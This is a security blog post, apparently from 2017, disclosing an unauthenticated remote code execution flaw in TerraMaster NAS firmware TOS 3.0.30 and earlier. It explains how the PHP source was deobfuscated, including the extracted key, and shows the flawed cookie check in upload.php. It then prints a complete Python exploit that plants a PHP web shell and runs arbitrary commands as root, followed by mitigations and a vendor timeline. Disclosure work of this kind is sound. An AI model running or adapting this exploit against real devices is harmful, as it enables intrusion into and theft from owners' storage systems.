<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually">
<meta name="keywords" content="vulnerability,exploit,rce,disclosure,terramaster,nas">
<meta property="og:type" content="article">
<meta property="og:title" content="TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root">
<meta property="og:url" content="https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/index.html">
<meta property="og:site_name" content="evilsocket">
<meta property="og:description" content="Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://www.evilsocket.net/images/2017/05/exploit.png">
<meta property="og:image" content="https://www.evilsocket.net/images/2017/05/obfuscated.png">
<meta property="og:image" content="https://www.evilsocket.net/images/2017/05/configure.png">
<meta property="og:image" content="https://www.evilsocket.net/images/2017/05/bingo.png">
<meta property="og:image" content="https://www.evilsocket.net/images/2015/Jan/major-facepalm.jpg">
<meta property="og:updated_time" content="2018-11-22T15:29:42.749Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root">
<meta name="twitter:description" content="Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually">
<meta name="twitter:image" content="https://www.evilsocket.net/images/2017/05/exploit.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon.ico" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
          
        
    
    <!-- title -->
    <title>TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="evilsocket" type="application/atom+xml">
    
</head>

<body class="max-width mx-auto px3 ltr">    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2017/06/30/BetterCap-1-6-1-TLS-Server-Name-Indication-and-Why-We-Need-to-Encrypt-It/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2017/04/27/Android-Applications-Reversing-101/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&text=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&is_video=false&description=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root&body=Check out this article: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&name=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root&description=&lt;p&gt;Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually I wanted to see how it was implemented, moreover I was curious to see if I could find any remotely exploitable vulnerability.&lt;/p&gt;
&lt;p&gt;As you can see … I succeeded :)&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/images/2017/05/exploit.png&quot; alt=&quot;nas&quot;&gt;&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit"><span class="toc-number">1.</span> <span class="toc-text">Exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mitigations"><span class="toc-number">2.</span> <span class="toc-text">Mitigations</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Timeline"><span class="toc-number">3.</span> <span class="toc-text">Timeline</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline" style="text-transform: uppercase;">
        TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root
    </h1>



    <div class="meta">
      
    <div class="postdate">
        <time datetime="2017-05-30T11:15:28.000Z" itemprop="datePublished">2017-05-30</time>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/disclosure/">disclosure</a>, <a class="tag-link" href="/tags/exploit/">exploit</a>, <a class="tag-link" href="/tags/nas/">nas</a>, <a class="tag-link" href="/tags/rce/">rce</a>, <a class="tag-link" href="/tags/terramaster/">terramaster</a>, <a class="tag-link" href="/tags/vulnerability/">vulnerability</a>
    </div>


    </div>
    <div class="addthis_sharing_toolbox"></div>
  </header>

    <br>
  

  <div class="content" itemprop="articleBody">
    <p>Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually I wanted to see how it was implemented, moreover I was curious to see if I could find any remotely exploitable vulnerability.</p>
<p>As you can see … I succeeded :)</p>
<p><img src="/images/2017/05/exploit.png" alt="nas"></p>
<a id="more"></a>
<p>Once connected to the NAS through SSH, I realized the whole interface was a PHP application stored on <code>/usr/www/</code>, but unfortunately the source code was obfuscated:</p>
<p><img src="/images/2017/05/obfuscated.png" alt="obfuscated"></p>
<p>Printing PHP compilation options and modules revealed what kind of obfuscation was going on, <code>php_screw</code>:</p>
<p><img src="/images/2017/05/configure.png" alt="configure"></p>
<p>Lucky me, there’s the <a href="https://github.com/dehydr8/php_unscrew" target="_blank" rel="noopener">php_unscrew</a> tool written by Osama Khalid, I only had to follow the instructions on the repository in order to extract the key and header length from the encrypted files on the NAS, which happened to be <code>d311ea00d301b80c3f00</code> and <code>13</code>.</p>
<p><img src="/images/2017/05/bingo.png" alt="bingo"></p>
<p>At this stage, I could read any PHP file running on the NAS, until I found what I’ve been looking for, <code>/usr/www/include/upload.php</code> which, as you guessed, handles file uploads to the NAS … and here’s all the authentication involved:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">$targetDir = $_REQUEST[<span class="string">'targetDir'</span>];</span><br><span class="line">$file_path = @realpath($targetDir);</span><br><span class="line"><span class="keyword">if</span>(strstr($file_path, <span class="string">"/mnt/base/update"</span>) === <span class="keyword">false</span>)&#123;</span><br><span class="line">	<span class="keyword">if</span>(!$_COOKIE[<span class="string">'kod_name'</span>])&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">'&#123;"jsonrpc" : "2.0", "error" : &#123;"code": 104, "message": "You are not login!"&#125;, "id" : "id"&#125;'</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>TL;DR; As long as you set the <code>kod_name</code> cookie to <strong>any</strong> value, the system considers you as authenticated and lets you <strong>upload any file to any location on the file system</strong> … oh, did I mention that the web server <strong>is running as root</strong>? </p>
<p><img src="/images/2015/Jan/major-facepalm.jpg" alt="facepalm"></p>
<p>I contacted the vendor on May 11 and initially they seemed to care assuring me an update would have been released in a couple of days … 19 days ellapsed, still no fixes and they’re ignoring my emails now, so I decided to go full disclosure.</p>
<h3 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># coding: utf8</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Exploit: Unauthenticated RCE as root.</span></span><br><span class="line"><span class="comment"># Vendor: TerraMaster</span></span><br><span class="line"><span class="comment"># Product: TOS &lt;= 3.0.30 (running on every NAS)</span></span><br><span class="line"><span class="comment"># Author: Simone 'evilsocket' Margaritelli &lt;evilsocket@protonmail.com&gt; </span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload</span><span class="params">( address, port, filename, path = <span class="string">'/usr/www/'</span> )</span>:</span></span><br><span class="line">    url = <span class="string">"http://%s:%d/include/upload.php?targetDir=%s"</span> % ( address, port, path )</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        files = &#123; <span class="string">'file'</span>: open( filename, <span class="string">'rb'</span> ) &#125;</span><br><span class="line">        cookies = &#123; <span class="string">'kod_name'</span>: <span class="string">'1'</span> &#125; <span class="comment"># LOL :D</span></span><br><span class="line">        r = requests.post(url, files=files, cookies=cookies)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> r.text != <span class="string">'&#123;"jsonrpc" : "2.0", "result" : null, "id" : "id"&#125;'</span>:</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"! Unexpected response, exploit might not work:\n%s\n"</span> % r.text</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"\n! ERROR: %s"</span> % e</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rce</span><span class="params">( address, port, command )</span>:</span></span><br><span class="line">    <span class="keyword">with</span> open( <span class="string">'/tmp/p.php'</span>, <span class="string">'w+t'</span> ) <span class="keyword">as</span> fp:</span><br><span class="line">        fp.write( <span class="string">"&lt;?php system('%s'); ?&gt;"</span> % command )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> upload( address, port, <span class="string">'/tmp/p.php'</span> ) == <span class="keyword">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            url = <span class="string">"http://%s:%d/p.php"</span> % ( address, port )</span><br><span class="line">            <span class="keyword">return</span> requests.get(url).text</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"\n! ERROR: %s"</span> % e</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">None</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) &lt; <span class="number">3</span>:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"Usage: exploit.py &lt;ip|hostname&gt; &lt;command&gt; (port=8181)\n"</span></span><br><span class="line">    quit()</span><br><span class="line"></span><br><span class="line">target  = sys.argv[<span class="number">1</span>]</span><br><span class="line">command = sys.argv[<span class="number">2</span>]</span><br><span class="line">port    = <span class="number">8181</span> <span class="keyword">if</span> len(sys.argv) &lt; <span class="number">4</span> <span class="keyword">else</span> int(sys.argv[<span class="number">3</span>])</span><br><span class="line"></span><br><span class="line">out = rce( target, port, command )</span><br><span class="line"><span class="keyword">if</span> out <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">None</span>:</span><br><span class="line">    <span class="keyword">print</span> out.strip()</span><br></pre></td></tr></table></figure>
<h3 id="Mitigations"><a href="#Mitigations" class="headerlink" title="Mitigations"></a>Mitigations</h3><ul>
<li>Use a firewall to disable access to port <code>8181</code> of the NAS from untrusted users.</li>
<li>If possible (NAS only used via SMB/NFS/SSH) completely delete the web ui.</li>
<li>Hope for the vendor to quickly release a fix.</li>
<li>Alternatively, <strong>buy another and more secure NAS</strong> :)</li>
</ul>
<h3 id="Timeline"><a href="#Timeline" class="headerlink" title="Timeline"></a>Timeline</h3><ul>
<li>11 May 2017: Initial report to TerraMaster.</li>
<li>12 May 2017: TM acknowledged the issue and promised a fix within <em>a couple of days</em>.</li>
<li>16 May 2017: Follow up, still no fix.</li>
<li>25 May 2017: Follow up, still no fix.</li>
<li>29 May 2017: Follow up, still no fix and no answers neither.</li>
<li>30 May 2017: Disclosure.</li>
</ul>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit"><span class="toc-number">1.</span> <span class="toc-text">Exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mitigations"><span class="toc-number">2.</span> <span class="toc-text">Mitigations</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Timeline"><span class="toc-number">3.</span> <span class="toc-text">Timeline</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&text=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&is_video=false&description=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root&body=Check out this article: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&title=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/&name=TerraMaster NAS TOS &lt;= 3.0.30 Unauthenticated RCE as Root&description=&lt;p&gt;Recently I bought a TerraMaster F2-420 NAS from Amazon in order to store my private code, backups and this kind of stuff. As soon as it arrived I started to play with its web interface and eventually I wanted to see how it was implemented, moreover I was curious to see if I could find any remotely exploitable vulnerability.&lt;/p&gt;
&lt;p&gt;As you can see … I succeeded :)&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/images/2017/05/exploit.png&quot; alt=&quot;nas&quot;&gt;&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Simone Margaritelli
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-22026549-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'evilsocket';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4da572964da15ce9" async="async"></script>

